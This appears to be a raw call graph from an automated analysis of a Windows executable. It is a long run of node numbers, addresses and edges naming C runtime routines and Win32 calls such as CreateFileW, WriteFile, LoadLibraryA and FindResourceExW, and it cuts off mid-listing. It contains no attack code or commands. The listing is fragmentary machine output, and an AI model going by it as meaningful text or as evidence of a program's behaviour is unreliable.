104201 c13932 104199->104201 104200->104201 104202 c18ee0 104201->104202 104203 c4f17c 104202->104203 104205 c18ef7 104202->104205 104203->104205 104576 c18bdb 59 API calls Mailbox 104203->104576 104206 c19040 104205->104206 104207 c18ff8 104205->104207 104210 c18fff 104205->104210 104575 c19d3c 60 API calls Mailbox 104206->104575 104208 c30db6 Mailbox 59 API calls 104207->104208 104208->104210 104210->103996 104212 c14ee5 85 API calls 104211->104212 104213 c795ca 104212->104213 104577 c79734 104213->104577 104216 c14f0b 74 API calls 104217 c795f7 104216->104217 104218 c14f0b 74 API calls 104217->104218 104219 c79607 104218->104219 104220 c14f0b 74 API calls 104219->104220 104221 c79622 104220->104221 104222 c14f0b 74 API calls 104221->104222 104223 c7963d 104222->104223 104224 c14ee5 85 API calls 104223->104224 104225 c79654 104224->104225 104226 c3571c __malloc_crt 58 API calls 104225->104226 104227 c7965b 104226->104227 104228 c3571c __malloc_crt 58 API calls 104227->104228 104229 c79665 104228->104229 104230 c14f0b 74 API calls 104229->104230 104231 c79679 104230->104231 104232 c79109 GetSystemTimeAsFileTime 104231->104232 104233 c7968c 104232->104233 104234 c796b6 104233->104234 104235 c796a1 104233->104235 104236 c796bc 104234->104236 104237 c7971b 104234->104237 104238 c32d55 _free 58 API calls 104235->104238 104583 c78b06 104236->104583 104240 c32d55 _free 58 API calls 104237->104240 104241 c796a7 104238->104241 104243 c4d186 104240->104243 104244 c32d55 _free 58 API calls 104241->104244 104243->103933 104246 c14e4a 104243->104246 104244->104243 104245 c32d55 _free 58 API calls 104245->104243 104247 c14e54 104246->104247 104248 c14e5b 104246->104248 104249 c353a6 __fcloseall 83 API calls 104247->104249 104250 c14e7b FreeLibrary 104248->104250 104251 c14e6a 104248->104251 104249->104248 104250->104251 104251->103933 104253 c17e4f 59 API calls 104252->104253 104254 c179fd 104253->104254 104254->104134 104256 c13f82 104255->104256 104260 c13fa4 _memmove 104255->104260 104258 c30db6 Mailbox 59 API calls 104256->104258 104257 c30db6 Mailbox 59 API calls 104259 c13fb8 104257->104259 104258->104260 104259->104143 104260->104257 104310 c14c03 104261->104310 104264 c14bdc 104266 c14bf5 104264->104266 104267 c14bec FreeLibrary 104264->104267 104265 c14c03 2 API calls 104265->104264 104268 c3525b 104266->104268 104267->104266 104314 c35270 104268->104314 104270 c14dfc 104270->104149 104270->104150 104474 c14c36 104271->104474 104274 c14ba1 FreeLibrary 104275 c14baa 104274->104275 104278 c14c70 104275->104278 104276 c14c36 2 API calls 104277 c14b8f 104276->104277 104277->104274 104277->104275 104279 c30db6 Mailbox 59 API calls 104278->104279 104280 c14c85 104279->104280 104478 c1522e 104280->104478 104282 c14c91 _memmove 104283 c14ccc 104282->104283 104284 c14dc1 104282->104284 104285 c14d89 104282->104285 104286 c14ec7 69 API calls 104283->104286 104492 c7991b 95 API calls 104284->104492 104481 c14e89 CreateStreamOnHGlobal 104285->104481 104292 c14cd5 104286->104292 104289 c14f0b 74 API calls 104289->104292 104290 c14d69 104290->104157 104292->104289 104292->104290 104293 c4d8a7 104292->104293 104487 c14ee5 104292->104487 104294 c14ee5 85 API calls 104293->104294 104295 c4d8bb 104294->104295 104296 c14f0b 74 API calls 104295->104296 104296->104290 104298 c4d9cd 104297->104298 104299 c14f1d 104297->104299 104516 c355e2 104299->104516 104302 c79109 104536 c78f5f 104302->104536 104304 c7911f 104304->104165 104306 c4d990 104305->104306 104307 c14ed6 104305->104307 104541 c35c60 104307->104541 104309 c14ede 104309->104167 104311 c14bd0 104310->104311 104312 c14c0c LoadLibraryA 104310->104312 104311->104264 104311->104265 104312->104311 104313 c14c1d GetProcAddress 104312->104313 104313->104311 104317 c3527c __setmbcp 104314->104317 104315 c3528f 104363 c38b28 58 API calls __getptd_noexit 104315->104363 104317->104315 104319 c352c0 104317->104319 104318 c35294 104364 c38db6 9 API calls __wopenfile 104318->104364 104333 c404e8 104319->104333 104322 c352c5 104323 c352db 104322->104323 104324 c352ce 104322->104324 104326 c35305 104323->104326 104327 c352e5 104323->104327 104365 c38b28 58 API calls __getptd_noexit 104324->104365 104348 c40607 104326->104348 104366 c38b28 58 API calls __getptd_noexit 104327->104366 104328 c3529f @_EH4_CallFilterFunc@8 __setmbcp 104328->104270 104334 c404f4 __setmbcp 104333->104334 104335 c39c0b __lock 58 API calls 104334->104335 104341 c40502 104335->104341 104336 c4057d 104373 c3881d 58 API calls __malloc_crt 104336->104373 104339 c40584 104346 c40576 104339->104346 104374 c39e2b InitializeCriticalSectionAndSpinCount 104339->104374 104340 c405f3 __setmbcp 104340->104322 104341->104336 104343 c39c93 __mtinitlocknum 58 API calls 104341->104343 104341->104346 104371 c36c50 59 API calls __lock 104341->104371 104372 c36cba LeaveCriticalSection LeaveCriticalSection _doexit 104341->104372 104343->104341 104345 c405aa EnterCriticalSection 104345->104346 104368 c405fe 104346->104368 104349 c40627 __wopenfile 104348->104349 104350 c40641 104349->104350 104362 c407fc 104349->104362 104381 c337cb 60 API calls 2 library calls 104349->104381 104379 c38b28 58 API calls __getptd_noexit 104350->104379 104352 c40646 104380 c38db6 9 API calls __wopenfile 104352->104380 104354 c4085f 104376 c485a1 104354->104376 104356 c35310 104367 c35332 LeaveCriticalSection LeaveCriticalSection __wfsopen 104356->104367 104358 c407f5 104358->104362 104382 c337cb 60 API calls 2 library calls 104358->104382 104360 c40814 104360->104362 104383 c337cb 60 API calls 2 library calls 104360->104383 104362->104350 104362->104354 104363->104318 104364->104328 104365->104328 104366->104328 104367->104328 104375 c39d75 LeaveCriticalSection 104368->104375 104370 c40605 104370->104340 104371->104341 104372->104341 104373->104339 104374->104345 104375->104370 104384 c47d85 104376->104384 104378 c485ba 104378->104356 104379->104352 104380->104356 104381->104358 104382->104360 104383->104362 104386 c47d91 __setmbcp 104384->104386 104385 c47da7 104471 c38b28 58 API calls __getptd_noexit 104385->104471 104386->104385 104389 c47ddd 104386->104389 104388 c47dac 104472 c38db6 9 API calls __wopenfile 104388->104472 104395 c47e4e 104389->104395 104392 c47df9 104473 c47e22 LeaveCriticalSection __unlock_fhandle 104392->104473 104394 c47db6 __setmbcp 104394->104378 104396 c47e6e 104395->104396 104397 c344ea __wsopen_nolock 58 API calls 104396->104397 104400 c47e8a 104397->104400 104398 c38dc6 __invoke_watson 8 API calls 104399 c485a0 104398->104399 104401 c47d85 __wsopen_helper 103 API calls 104399->104401 104402 c47ec4 104400->104402 104413 c47ee7 104400->104413 104418 c47fc1 104400->104418 104403 c485ba 104401->104403 104404 c38af4 __set_osfhnd 58 API calls 104402->104404 104403->104392 104405 c47ec9 104404->104405 104406 c38b28 __wopenfile 58 API calls 104405->104406 104407 c47ed6 104406->104407 104409 c38db6 __wopenfile 9 API calls 104407->104409 104408 c47fa5 104410 c38af4 __set_osfhnd 58 API calls 104408->104410 104411 c47ee0 104409->104411 104412 c47faa 104410->104412 104411->104392 104414 c38b28 __wopenfile 58 API calls 104412->104414 104413->104408 104417 c47f83 104413->104417 104415 c47fb7 104414->104415 104416 c38db6 __wopenfile 9 API calls 104415->104416 104416->104418 104419 c3d294 __alloc_osfhnd 61 API calls 104417->104419 104418->104398 104420 c48051 104419->104420 104421 c4807e 104420->104421 104422 c4805b 104420->104422 104423 c47cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 104421->104423 104424 c38af4 __set_osfhnd 58 API calls 104422->104424 104433 c480a0 104423->104433 104425 c48060 104424->104425 104427 c38b28 __wopenfile 58 API calls 104425->104427 104426 c4811e GetFileType 104428 c48129 GetLastError 104426->104428 104429 c4816b 104426->104429 104431 c4806a 104427->104431 104432 c38b07 __dosmaperr 58 API calls 104428->104432 104441 c3d52a __set_osfhnd 59 API calls 104429->104441 104430 c480ec GetLastError 104434 c38b07 __dosmaperr 58 API calls 104430->104434 104435 c38b28 __wopenfile 58 API calls 104431->104435 104436 c48150 CloseHandle 104432->104436 104433->104426 104433->104430 104437 c47cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 104433->104437 104438 c48111 104434->104438 104435->104411 104436->104438 104439 c4815e 104436->104439 104440 c480e1 104437->104440 104443 c38b28 __wopenfile 58 API calls 104438->104443 104442 c38b28 __wopenfile 58 API calls 104439->104442 104440->104426 104440->104430 104446 c48189 104441->104446 104444 c48163 104442->104444 104443->104418 104444->104438 104445 c48344 104445->104418 104449 c48517 CloseHandle 104445->104449 104446->104445 104447 c418c1 __lseeki64_nolock 60 API calls 104446->104447 104463 c4820a 104446->104463 104448 c481f3 104447->104448 104452 c38af4 __set_osfhnd 58 API calls 104448->104452 104467 c48212 104448->104467 104450 c47cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 104449->104450 104451 c4853e 104450->104451 104454 c48546 GetLastError 104451->104454 104455 c483ce 104451->104455 104452->104463 104453 c40e5b 70 API calls __read_nolock 104453->104467 104456 c38b07 __dosmaperr 58 API calls 104454->104456 104455->104418 104457 c48552 104456->104457 104459 c3d43d __free_osfhnd 59 API calls 104457->104459 104458 c40add __close_nolock 61 API calls 104458->104467 104459->104455 104460 c497a2 __chsize_nolock 82 API calls 104460->104467 104461 c418c1 60 API calls __lseeki64_nolock 104461->104463 104462 c3d886 __write 78 API calls 104462->104463 104463->104445 104463->104461 104463->104462 104463->104467 104464 c483c1 104466 c40add __close_nolock 61 API calls 104464->104466 104465 c483aa 104465->104445 104469 c483c8 104466->104469 104467->104453 104467->104458 104467->104460 104467->104463 104467->104464 104467->104465 104468 c418c1 60 API calls __lseeki64_nolock 104467->104468 104468->104467 104470 c38b28 __wopenfile 58 API calls 104469->104470 104470->104455 104471->104388 104472->104394 104473->104394 104475 c14b83 104474->104475 104476 c14c3f LoadLibraryA 104474->104476 104475->104276 104475->104277 104476->104475 104477 c14c50 GetProcAddress 104476->104477 104477->104475 104479 c30db6 Mailbox 59 API calls 104478->104479 104480 c15240 104479->104480 104480->104282 104482 c14ec0 104481->104482 104483 c14ea3 FindResourceExW 104481->104483 104482->104283 104483->104482 104484 c4d933 LoadResource 104483->104484 104484->104482 104485 c4d948 SizeofResource 104484->104485 104485->104482 104486 c4d95c LockResource 104485->104486 104486->104482 104488 c14ef4 104487->104488 104489 c4d9ab 104487->104489 104493 c3584d 104488->104493 104491 c14f02 104491->104292 104492->104283 104494 c35859 __setmbcp 104493->104494 104495 c3586b 104494->104495 104497 c35891 104494->104497 104506 c38b28 58 API calls __getptd_noexit 104495->104506 104508 c36c11 104497->104508 104498 c35870 104507 c38db6 9 API calls __wopenfile 104498->104507 104501 c35897 104514 c357be 83 API calls 5 library calls 104501->104514 104503 c358a6 104515 c358c8 LeaveCriticalSection LeaveCriticalSection __wfsopen 104503->104515 104505 c3587b __setmbcp 104505->104491 104506->104498 104507->104505 104509 c36c43 EnterCriticalSection 104508->104509 104510 c36c21 104508->104510 104511 c36c39 104509->104511 104510->104509 104512 c36c29 104510->104512 104511->104501 104513 c39c0b __lock 58 API calls 104512->104513 104513->104511 104514->104503 104515->104505 104519 c355fd 104516->104519 104518 c14f2e 104518->104302 104520 c35609 __setmbcp 104519->104520 104521 c3564c 104520->104521 104523 c3561f _memset 104520->104523 104531 c35644 __setmbcp 104520->104531 104522 c36c11 __lock_file 59 API calls 104521->104522 104525 c35652 104522->104525 104532 c38b28 58 API calls __getptd_noexit 104523->104532 104534 c3541d 72 API calls 5 library calls 104525->104534 104526 c35639 104533 c38db6 9 API calls __wopenfile 104526->104533 104528 c35668 104535 c35686 LeaveCriticalSection LeaveCriticalSection __wfsopen 104528->104535 104531->104518 104532->104526 104533->104531 104534->104528 104535->104531 104539 c3520a GetSystemTimeAsFileTime 104536->104539 104538 c78f6e 104538->104304 104540 c35238 __aulldiv 104539->104540 104540->104538 104542 c35c6c __setmbcp 104541->104542 104543 c35c93 104542->104543 104544 c35c7e 104542->104544 104546 c36c11 __lock_file 59 API calls 104543->104546 104555 c38b28 58 API calls __getptd_noexit 104544->104555 104548 c35c99 104546->104548 104547 c35c83 104556 c38db6 9 API calls __wopenfile 104547->104556 104557 c358d0 67 API calls 6 library calls 104548->104557 104551 c35ca4 104558 c35cc4 LeaveCriticalSection LeaveCriticalSection __wfsopen 104551->104558 104553 c35cb6 104554 c35c8e __setmbcp 104553->104554 104554->104309 104555->104547 104556->104554 104557->104551 104558->104553 104559->104172 104560->104187 104561->104189 104562->104186 104564 c30db6 Mailbox 59 API calls 104563->104564 104565 c19209 104564->104565 104565->104195 104567 c19169 Mailbox 104566->104567 104568 c4f19f 104567->104568 104573 c19173 104567->104573 104569 c30db6 Mailbox 59 API calls 104568->104569 104571 c4f1ab 104569->104571 104570 c1917a 104570->104199 104573->104570 104574 c19c90 59 API calls Mailbox 104573->104574 104574->104573 104575->104210 104576->104205 104581 c79748 __tzset_nolock _wcscmp 104577->104581 104578 c795dc 104578->104216 104578->104243 104579 c14f0b 74 API calls 104579->104581 104580 c79109 GetSystemTimeAsFileTime 104580->104581 104581->104578 104581->104579 104581->104580 104582 c14ee5 85 API calls 104581->104582 104582->104581 104584 c78b11 104583->104584 104585 c78b1f 104583->104585 104586 c3525b 115 API calls 104584->104586 104587 c78b64 104585->104587 104588 c3525b 115 API calls 104585->104588 104613 c78b28 104585->104613 104586->104585 104614 c78d91 74 API calls 3 library calls 104587->104614 104590 c78b49 104588->104590 104590->104587 104594 c78b52 104590->104594 104591 c78ba8 104592 c78bcd 104591->104592 104593 c78bac 104591->104593 104615 c789a9 58 API calls __malloc_crt 104592->104615 104595 c78bb9 104593->104595 104598 c353a6 __fcloseall 83 API calls 104593->104598 104594->104613 104625 c353a6 104594->104625 104602 c353a6 __fcloseall 83 API calls 104595->104602 104595->104613 104598->104595 104599 c78bd5 104600 c78bfb 104599->104600 104601 c78bdb 104599->104601 104616 c78c2b 90 API calls 104600->104616 104603 c78be8 104601->104603 104605 c353a6 __fcloseall 83 API calls 104601->104605 104602->104613 104607 c353a6 __fcloseall 83 API calls 104603->104607 104603->104613 104605->104603 104606 c78c02 104617 c78d0d 104606->104617 104607->104613 104610 c78c16 104612 c353a6 __fcloseall 83 API calls 104610->104612 104610->104613 104611 c353a6 __fcloseall 83 API calls 104611->104610 104612->104613 104613->104245 104614->104591 104615->104599 104616->104606 104618 c78d1a 104617->104618 104621 c78d20 104617->104621 104619 c32d55 _free 58 API calls 104618->104619 104619->104621 104620 c78d31 104623 c78c09 104620->104623 104624 c32d55 _free 58 API calls 104620->104624 104621->104620 104622 c32d55 _free 58 API calls 104621->104622 104622->104620 104623->104610 104623->104611 104624->104623 104626 c353b2 __setmbcp 104625->104626 104627 c353c6 104626->104627 104628 c353de 104626->104628 104654 c38b28 58 API calls __getptd_noexit 104627->104654 104630 c36c11 __lock_file 59 API calls 104628->104630 104635 c353d6 __setmbcp 104628->104635 104632 c353f0 104630->104632 104631 c353cb 104655 c38db6 9 API calls __wopenfile 104631->104655 104638 c3533a 104632->104638 104635->104613 104639 c35349 104638->104639 104640 c3535d 104638->104640 104700 c38b28 58 API calls __getptd_noexit 104639->104700 104647 c35359 104640->104647 104657 c34a3d 104640->104657 104643 c3534e 104701 c38db6 9 API calls __wopenfile 104643->104701 104656 c35415 LeaveCriticalSection LeaveCriticalSection __wfsopen 104647->104656 104650 c35377 104674 c40a02 104650->104674 104652 c3537d 104652->104647 104653 c32d55 _free 58 API calls 104652->104653 104653->104647 104654->104631 104655->104635 104656->104635 104658 c34a50 104657->104658 104659 c34a74 104657->104659 104658->104659 104660 c346e6 __filbuf 58 API calls 104658->104660 104663 c40b77 104659->104663 104661 c34a6d 104660->104661 104702 c3d886 104661->104702 104664 c35371 104663->104664 104665 c40b84 104663->104665 104667 c346e6 104664->104667 104665->104664 104666 c32d55 _free 58 API calls 104665->104666 104666->104664 104668 c346f0 104667->104668 104669 c34705 104667->104669 104812 c38b28 58 API calls __getptd_noexit 104668->104812 104669->104650 104671 c346f5 104813 c38db6 9 API calls __wopenfile 104671->104813 104673 c34700 104673->104650 104675 c40a0e __setmbcp 104674->104675 104676 c40a32 104675->104676 104677 c40a1b 104675->104677 104679 c40abd 104676->104679 104681 c40a42 104676->104681 104829 c38af4 58 API calls __getptd_noexit 104677->104829 104834 c38af4 58 API calls __getptd_noexit 104679->104834 104680 c40a20 104830 c38b28 58 API calls __getptd_noexit 104680->104830 104684 c40a60 104681->104684 104685 c40a6a 104681->104685 104831 c38af4 58 API calls __getptd_noexit 104684->104831 104687 c3d206 ___lock_fhandle 59 API calls 104685->104687 104686 c40a65 104835 c38b28 58 API calls __getptd_noexit 104686->104835 104689 c40a70 104687->104689 104692 c40a83 104689->104692 104693 c40a8e 104689->104693 104691 c40ac9 104836 c38db6 9 API calls __wopenfile 104691->104836 104814 c40add 104692->104814 104832 c38b28 58 API calls __getptd_noexit 104693->104832 104696 c40a27 __setmbcp 104696->104652 104698 c40a89 104833 c40ab5 LeaveCriticalSection __unlock_fhandle 104698->104833 104700->104643 104701->104647 104703 c3d892 __setmbcp 104702->104703 104704 c3d8b6 104703->104704 104705 c3d89f 104703->104705 104707 c3d955 104704->104707 104709 c3d8ca 104704->104709 104803 c38af4 58 API calls __getptd_noexit 104705->104803 104809 c38af4 58 API calls __getptd_noexit 104707->104809 104708 c3d8a4 104804 c38b28 58 API calls __getptd_noexit 104708->104804 104712 c3d8f2 104709->104712 104713 c3d8e8 104709->104713 104730 c3d206 104712->104730 104805 c38af4 58 API calls __getptd_noexit 104713->104805 104714 c3d8ed 104810 c38b28 58 API calls __getptd_noexit 104714->104810 104717 c3d8f8 104719 c3d90b 104717->104719 104720 c3d91e 104717->104720 104739 c3d975 104719->104739 104806 c38b28 58 API calls __getptd_noexit 104720->104806 104721 c3d961 104811 c38db6 9 API calls __wopenfile 104721->104811 104724 c3d8ab __setmbcp 104724->104659 104726 c3d917 104808 c3d94d LeaveCriticalSection __unlock_fhandle 104726->104808 104727 c3d923 104807 c38af4 58 API calls __getptd_noexit 104727->104807 104732 c3d212 __setmbcp 104730->104732 104731 c3d261 EnterCriticalSection 104733 c3d287 __setmbcp 104731->104733 104732->104731 104734 c39c0b __lock 58 API calls 104732->104734 104733->104717 104735 c3d237 104734->104735 104736 c3d24f 104735->104736 104738 c39e2b __ioinit InitializeCriticalSectionAndSpinCount 104735->104738 104737 c3d28b ___lock_fhandle LeaveCriticalSection 104736->104737 104737->104731 104738->104736 104740 c3d982 __write_nolock 104739->104740 104741 c3d9c1 104740->104741 104742 c3d9e0 104740->104742 104770 c3d9b6 104740->104770 104743 c38af4 __set_osfhnd 58 API calls 104741->104743 104746 c3da38 104742->104746 104747 c3da1c 104742->104747 104745 c3d9c6 104743->104745 104744 c3c5f6 __call_reportfault 6 API calls 104748 c3e1d6 104744->104748 104749 c38b28 __wopenfile 58 API calls 104745->104749 104750 c3da51 104746->104750 104753 c418c1 __lseeki64_nolock 60 API calls 104746->104753 104751 c38af4 __set_osfhnd 58 API calls 104747->104751 104748->104726 104752 c3d9cd 104749->104752 104754 c45c6b __flswbuf 58 API calls 104750->104754 104755 c3da21 104751->104755 104756 c38db6 __wopenfile 9 API calls 104752->104756 104753->104750 104757 c3da5f 104754->104757 104758 c38b28 __wopenfile 58 API calls 104755->104758 104756->104770 104759 c3ddb8 104757->104759 104764 c399ac _LocaleUpdate::_LocaleUpdate 58 API calls 104757->104764 104760 c3da28 104758->104760 104761 c3ddd6 104759->104761 104762 c3e14b WriteFile 104759->104762 104763 c38db6 __wopenfile 9 API calls 104760->104763 104765 c3defa 104761->104765 104774 c3ddec 104761->104774 104766 c3ddab GetLastError 104762->104766 104772 c3dd78 104762->104772 104763->104770 104767 c3da8b GetConsoleMode 104764->104767 104776 c3df05 104765->104776 104780 c3dfef 104765->104780 104766->104772 104767->104759 104769 c3daca 104767->104769 104768 c3e184 104768->104770 104771 c38b28 __wopenfile 58 API calls 104768->104771 104769->104759 104773 c3dada GetConsoleCP 104769->104773 104770->104744 104778 c3e1b2 104771->104778 104772->104768 104772->104770 104779 c3ded8 104772->104779 104773->104768 104801 c3db09 104773->104801 104774->104768 104775 c3de5b WriteFile 104774->104775 104775->104766 104777 c3de98 104775->104777 104776->104768 104781 c3df6a WriteFile 104776->104781 104777->104774 104782 c3debc 104777->104782 104783 c38af4 __set_osfhnd 58 API calls 104778->104783 104784 c3dee3 104779->104784 104785 c3e17b 104779->104785 104780->104768 104786 c3e064 WideCharToMultiByte 104780->104786 104781->104766 104787 c3dfb9 104781->104787 104782->104772 104783->104770 104788 c38b28 __wopenfile 58 API calls 104784->104788 104789 c38b07 __dosmaperr 58 API calls 104785->104789 104786->104766 104795 c3e0ab 104786->104795 104787->104772 104787->104776 104787->104782 104791 c3dee8 104788->104791 104789->104770 104790 c3e0b3 WriteFile 104793 c3e106 GetLastError 104790->104793 104790->104795 104794 c38af4 __set_osfhnd 58 API calls 104791->104794 104792 c335f5 __write_nolock 58 API calls 104792->104801 104793->104795 104794->104770 104795->104772 104795->104780 104795->104782 104795->104790 104796 c462ba 60 API calls __write_nolock 104796->104801 104797 c47a5e WriteConsoleW CreateFileW __putwch_nolock 104800 c3dc5f 104797->104800 104798 c3dbf2 WideCharToMultiByte 104798->104772 104799 c3dc2d WriteFile 104798->104799 104799->104766 104799->104800 104800->104766 104800->104772 104800->104797 104800->104801 104802 c3dc87 WriteFile 104800->104802 104801->104772 104801->104792 104801->104796 104801->104798 104801->104800 104802->104766 104802->104800 104803->104708 104804->104724 104805->104714 104806->104727 104807->104726 104808->104724 104809->104714 104810->104721 104811->104724 104812->104671 104813->104673 104837 c3d4c3 104814->104837 104816 c40b41 104850 c3d43d 59 API calls 2 library calls 104816->104850 104818 c40aeb 104818->104816 104819 c3d4c3 __lseek_nolock 58 API calls 104818->104819 104828 c40b1f 104818->104828 104823 c40b16 104819->104823 104820 c3d4c3 __lseek_nolock 58 API calls 104824 c40b2b CloseHandle 104820->104824 104821 c40b49 104822 c40b6b 104821->104822 104851 c38b07 58 API calls 3 library calls 104821->104851 104822->104698 104826 c3d4c3 __lseek_nolock 58 API calls 104823->104826 104824->104816 104827 c40b37 GetLastError 104824->104827 104826->104828 104827->104816 104828->104816 104828->104820 104829->104680 104830->104696 104831->104686 104832->104698 104833->104696 104834->104686 104835->104691 104836->104696 104838 c3d4e3 104837->104838 104839 c3d4ce 104837->104839 104842 c38af4 __set_osfhnd 58 API calls 104838->104842 104844 c3d508 104838->104844 104840 c38af4 __set_osfhnd 58 API calls 104839->104840 104841 c3d4d3 104840->104841 104843 c38b28 __wopenfile 58 API calls 104841->104843 104845 c3d512 104842->104845 104846 c3d4db 104843->104846 104844->104818 104847 c38b28 __wopenfile 58 API calls 104845->104847 104846->104818 104848 c3d51a 104847->104848 104849 c38db6 __wopenfile 9 API calls 104848->104849 104849->104846 104850->104821 104851->104822 104914 c41940 104852->104914 104855 c14799 104920 c17d8c 104855->104920 104856 c1477c 104857 c17bcc 59 API calls 104856->104857 104859 c14788 104857->104859 104916 c17726 104859->104916 104862 c30791 104863 c41940 __write_nolock 104862->104863 104864 c3079e GetLongPathNameW 104863->104864 104865 c17bcc 59 API calls 104864->104865 104866 c172bd 104865->104866 104867 c1700b 104866->104867 104868 c17667 59 API calls 104867->104868 104869 c1701d 104868->104869 104870 c14750 60 API calls 104869->104870 104871 c17028 104870->104871 104872 c17033 104871->104872 104878 c4e885 104871->104878 104873 c13f74 59 API calls 104872->104873 104875 c1703f 104873->104875 104924 c134c2 104875->104924 104877 c4e89f 104878->104877 104930 c17908 61 API calls 104878->104930 104879 c17052 Mailbox 104879->104012 104881 c14ddd 136 API calls 104880->104881 104882 c1688f 104881->104882 104883 c4e031 104882->104883 104884 c14ddd 136 API calls 104882->104884 104885 c7955b 122 API calls 104883->104885 104886 c168a3 104884->104886 104887 c4e046 104885->104887 104886->104883 104888 c168ab 104886->104888 104889 c4e067 104887->104889 104890 c4e04a 104887->104890 104892 c4e052 104888->104892 104893 c168b7 104888->104893 104891 c30db6 Mailbox 59 API calls 104889->104891 104894 c14e4a 84 API calls 104890->104894 104913 c4e0ac Mailbox 104891->104913 105024 c742f8 90 API calls _wprintf 104892->105024 104931 c16a8c 104893->104931 104894->104892 104898 c4e060 104898->104889 104899 c4e260 104900 c32d55 _free 58 API calls 104899->104900 104901 c4e268 104900->104901 104902 c14e4a 84 API calls 104901->104902 104907 c4e271 104902->104907 104906 c32d55 _free 58 API calls 104906->104907 104907->104906 104908 c14e4a 84 API calls 104907->104908 105030 c6f7a1 89 API calls 4 library calls 104907->105030 104908->104907 104910 c17de1 59 API calls 104910->104913 104913->104899 104913->104907 104913->104910 105025 c6f73d 59 API calls 2 library calls 104913->105025 105026 c6f65e 61 API calls 2 library calls 104913->105026 105027 c7737f 59 API calls Mailbox 104913->105027 105028 c1750f 59 API calls 2 library calls 104913->105028 105029 c1735d 59 API calls Mailbox 104913->105029 104915 c1475d GetFullPathNameW 104914->104915 104915->104855 104915->104856 104917 c17734 104916->104917 104918 c17d2c 59 API calls 104917->104918 104919 c14794 104918->104919 104919->104862 104921 c17da6 104920->104921 104922 c17d99 104920->104922 104923 c30db6 Mailbox 59 API calls 104921->104923 104922->104859 104923->104922 104925 c134d4 104924->104925 104929 c134f3 _memmove 104924->104929 104927 c30db6 Mailbox 59 API calls 104925->104927 104926 c30db6 Mailbox 59 API calls 104928 c1350a 104926->104928 104927->104929 104928->104879 104929->104926 104930->104878 104932 c16ab5 104931->104932 104933 c4e41e 104931->104933 105036 c157a6 60 API calls Mailbox 104932->105036 105103 c6f7a1 89 API calls 4 library calls 104933->105103 104936 c16ad7 105037 c157f6 67 API calls 104936->105037 104937 c4e431 105104 c6f7a1 89 API calls 4 library calls 104937->105104 104939 c16aec 104939->104937 104940 c16af4 104939->104940 104942 c17667 59 API calls 104940->104942 104944 c16b00 104942->104944 104943 c4e44d 104945 c16b61 104943->104945 105038 c30957 60 API calls __write_nolock 104944->105038 104947 c4e460 104945->104947 104948 c16b6f 104945->104948 104950 c15c6f CloseHandle 104947->104950 104951 c17667 59 API calls 104948->104951 104949 c16b0c 104952 c17667 59 API calls 104949->104952 104953 c4e46c 104950->104953 104954 c16b78 104951->104954 104955 c16b18 104952->104955 104956 c14ddd 136 API calls 104953->104956 104957 c17667 59 API calls 104954->104957 104958 c14750 60 API calls 104955->104958 104959 c4e488 104956->104959 104960 c16b81 104957->104960 104961 c16b26 104958->104961 104963 c4e4b1 104959->104963 104966 c7955b 122 API calls 104959->104966 105041 c1459b 104960->105041 105039 c15850 ReadFile SetFilePointerEx 104961->105039 105105 c6f7a1 89 API calls 4 library calls 104963->105105 104965 c16b52 105040 c15aee SetFilePointerEx SetFilePointerEx 104965->105040 104970 c4e4a4 104966->104970 104967 c16b98 104971 c17b2e 59 API calls 104967->104971 104973 c4e4ac 104970->104973 104974 c4e4cd 104970->104974 104975 c16ba9 SetCurrentDirectoryW 104971->104975 104972 c4e4c8 105001 c16d0c Mailbox 104972->105001 104976 c14e4a 84 API calls 104973->104976 104977 c14e4a 84 API calls 104974->104977 104980 c16bbc Mailbox 104975->104980 104976->104963 104978 c4e4d2 104977->104978 104979 c30db6 Mailbox 59 API calls 104978->104979 104986 c4e506 104979->104986 104982 c30db6 Mailbox 59 API calls 104980->104982 104984 c16bcf 104982->104984 104983 c13bbb 104983->103871 104983->103880 104985 c1522e 59 API calls 104984->104985 105013 c16bda Mailbox __wsetenvp 104985->105013 105106 c1750f 59 API calls 2 library calls 104986->105106 104988 c16ce7 105099 c15c6f 104988->105099 104991 c4e740 105112 c772df 59 API calls Mailbox 104991->105112 104992 c16cf3 SetCurrentDirectoryW 104992->105001 104995 c4e762 105113 c8fbce 59 API calls 2 library calls 104995->105113 104998 c4e76f 104999 c32d55 _free 58 API calls 104998->104999 104999->105001 105000 c4e7d9 105116 c6f7a1 89 API calls 4 library calls 105000->105116 105031 c157d4 105001->105031 105004 c4e7f2 105004->104988 105007 c4e7d1 105115 c6f5f7 59 API calls 4 library calls 105007->105115 105010 c17de1 59 API calls 105010->105013 105013->104988 105013->105000 105013->105007 105013->105010 105092 c1586d 67 API calls _wcscpy 105013->105092 105093 c16f5d GetStringTypeW 105013->105093 105094 c16ecc 60 API calls __wcsnicmp 105013->105094 105095 c16faa GetStringTypeW __wsetenvp 105013->105095 105096 c3363d GetStringTypeW _iswctype 105013->105096 105097 c168dc 165 API calls 3 library calls 105013->105097 105098 c17213 59 API calls Mailbox 105013->105098 105014 c17de1 59 API calls 105021 c4e54f Mailbox 105014->105021 105018 c4e792 105114 c6f7a1 89 API calls 4 library calls 105018->105114 105020 c4e7ab 105022 c32d55 _free 58 API calls 105020->105022 105021->104991 105021->105014 105021->105018 105107 c6f73d 59 API calls 2 library calls 105021->105107 105108 c6f65e 61 API calls 2 library calls 105021->105108 105109 c7737f 59 API calls Mailbox 105021->105109 105110 c1750f 59 API calls 2 library calls 105021->105110 105111 c17213 59 API calls Mailbox 105021->105111 105023 c4e7be 105022->105023 105023->105001 105024->104898 105025->104913 105026->104913 105027->104913 105028->104913 105029->104913 105030->104907 105032 c15c6f CloseHandle 105031->105032 105033 c157dc Mailbox 105032->105033 105034 c15c6f CloseHandle 105033->105034 105035 c157eb 105034->105035 105035->104983 105036->104936 105037->104939 105038->104949 105039->104965 105040->104945 105042 c17667 59 API calls 105041->105042 105043 c145b1 105042->105043 105044 c17667 59 API calls 105043->105044 105045 c145b9 105044->105045 105046 c17667 59 API calls 105045->105046 105047 c145c1 105046->105047 105048 c17667 59 API calls 105047->105048 105049 c145c9 105048->105049 105050 c4d4d2 105049->105050 105051 c145fd 105049->105051 105052 c18047 59 API calls 105050->105052 105053 c1784b 59 API calls 105051->105053 105054 c4d4db 105052->105054 105055 c1460b 105053->105055 105056 c17d8c 59 API calls 105054->105056 105057 c17d2c 59 API calls 105055->105057 105059 c14640 105056->105059 105058 c14615 